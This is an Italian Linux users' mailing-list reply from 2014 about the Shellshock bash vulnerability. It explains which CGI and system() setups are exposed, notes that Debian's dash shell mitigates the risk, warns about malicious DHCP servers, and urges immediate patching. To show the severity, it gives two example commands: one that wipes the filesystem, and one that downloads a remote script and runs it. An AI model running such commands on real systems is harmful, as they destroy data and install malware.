[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [linux_var] shellshock quali sw a rischio ?
On Fri, 26 Sep 2014 12:54:36 +0200
Lorenzo Lobba <lorenzo.lobba@gmail.com> wrote:
> Allora. Sono a rischio le CGI che usano bash (ksh, dash &C sono
> immuni) e potenzialmente quelle si basano su Perl e tramite "system"
> fanno una chiamata a una funzione bash.
Se fanno una system SONO vulnerabili, se bash e' la shell dell'utente. Quando tu lanci system('/usr/bin/ps') in realta' viene fatto un fork + exec /bin/sh -c /usr/bin/ps e quindi sei fregato.
La cosa e' subdola perche' non e' necessario che sia il cgi-bin a chiamare una bash, ma un qualsiasi sottoprocesso (o un sotto-sotto-processo).
> Inviando alla bash tramite variabili alcune stringe di caratteri, si
> possono eseguire in remoto comandi sul server.
> Da quanto ho capito si possono solo dare comandi di lettura. Il
> rischio è che le informazioni carpite possano essere poi usate per
> sfruttare altre vulnerabilità.
Nein. Qualsiasi comando puo' essere chiamato. Compreso "rm -rf /". Oppure "wget http://sito/malware.sh; ./malware.sh".
Se usate debian o derivate, al 90% vi salvate, perche' la shell di default per gli script e' /bin/dash. Ma nel dubbio farei *subito* un aggiornamento. Le patch per questa vulnerabilita' sono gia' presenti nelle vostre distro di fiducia.
La cosa piu' inquietante, che oltre ai cgi-bin, potrebbero bucarvi il portatile, se vi collegate ad una rete con un dhcp "malevolo". Spero di aver reso l'idea della gravita'.
--
Diego Roversi <diegor@tiscali.it>
_______________________________________________
Talking mailing list
Talking@ml.linuxvar.it
http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking